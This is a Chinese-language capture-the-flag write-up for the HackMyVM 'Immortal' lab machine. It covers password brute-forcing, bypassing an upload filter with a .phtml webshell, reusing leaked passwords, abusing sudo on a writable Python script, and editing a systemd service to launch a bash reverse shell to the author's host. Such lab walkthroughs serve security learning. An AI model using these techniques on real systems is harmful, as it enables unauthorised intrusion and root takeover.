简介
靶场名:Immortal
难度:中等
靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Immortal
本地环境
虚拟机:vitual box
靶场IP(Immortal):192.168.56.106
跳板机IP(windows 10):192.168.56.1 192.168.190.100
渗透机IP(ubuntu 22.04):192.168.190.30
扫描
zenmap还真是可靠度随机呢……
nmap -p 1-65535 -T4 -A -v 192.168.56.106/32
http
朴素
BP爆破一下,得到密码为santiago
翻阅一下文件,先找到important.txt
中的莫斯电码
解密出来内容为NOTHIN7MPORTANT
。不论有没有用,先存着。
还有一些message.txt文件,这边汇总一下
I am very happy that you have included me in the project
for the quest for immortality. I am sure we will succeed, whatever it takes.
Best regards, Drake
Message to Eric.
Remember to buy mice for the experiments, there are very few left. Also remember to tell Boyras to give us the money he owes us, or else we'll have to beat it out of him ourselves.
Regards, David.
Message to all.
I'm glad you made it, I knew you would guess the password, it's the one we always used, although Boyras recommended us to stop using it because "it was in rockyou".
By the way guys, you can still upload messages to the server from this new path -> upload_an_incredible_message.php
Saying goodbye very happy, David
获得一个关键信息——文件上传路径为/upload_an_incredible_message.php
文件上传漏洞
先随便传个php马上去
看来是有点基础检测的,把文件后缀改成phtml成功上传
然后就是随便弹shell了
(话说头一次见到webshell就能拿flag的情况……)
提权
话说这也能算提权吗……
总之先看到drake的目录下面有个...
的目录
www-data@Immortal:/home/drake/...$ cat pass.txt
cat pass.txt
netflix : drake123
amazon : 123drake
shelldred : shell123dred (f4ns0nly)
system : kevcjnsgii
bank : myfavouritebank
nintendo : 123456
几个密码都试一下,到system的时候连进去了
sudo -l起手,看到有个权限
Matching Defaults entries for drake on Immortal:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User drake may run the following commands on Immortal:
(eric) NOPASSWD: /usr/bin/python3 /opt/immortal.py
这边的immortal.py对我们其实是有写权限的……所以也不用管了,直接写shell即可
drake@Immortal:/opt$ vi immortal.py
drake@Immortal:/opt$ cat immortal.py
import pty;pty.spawn("/bin/bash")
drake@Immortal:/opt$ sudo -u eric /usr/bin/python3 /opt/immortal.py
eric@Immortal:/opt$ id
uid=1002(eric) gid=1002(eric) groups=1002(eric)
eric@Immortal:/opt$
提权成功
service提权
sudo -l起手
eric@Immortal:~$ sudo -l
Matching Defaults entries for eric on Immortal:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User eric may run the following commands on Immortal:
(root) NOPASSWD: sudoedit /etc/systemd/system/immortal.service
(root) NOPASSWD: /usr/bin/systemctl start immortal.service
(root) NOPASSWD: /usr/bin/systemctl stop immortal.service
(root) NOPASSWD: /usr/bin/systemctl enable immortal.service
(root) NOPASSWD: /usr/bin/systemctl disable immortal.service
(root) NOPASSWD: /usr/bin/systemctl daemon-reload
执行sudoedit看了一下,发现可以更改service的内容
那这边也不客气了,直接在ExecStart
挂上反弹shell,然后重启服务
ExecStart=bash -c "bash -i >& /dev/tcp/192.168.56.1/40001 0>&1"
成功提权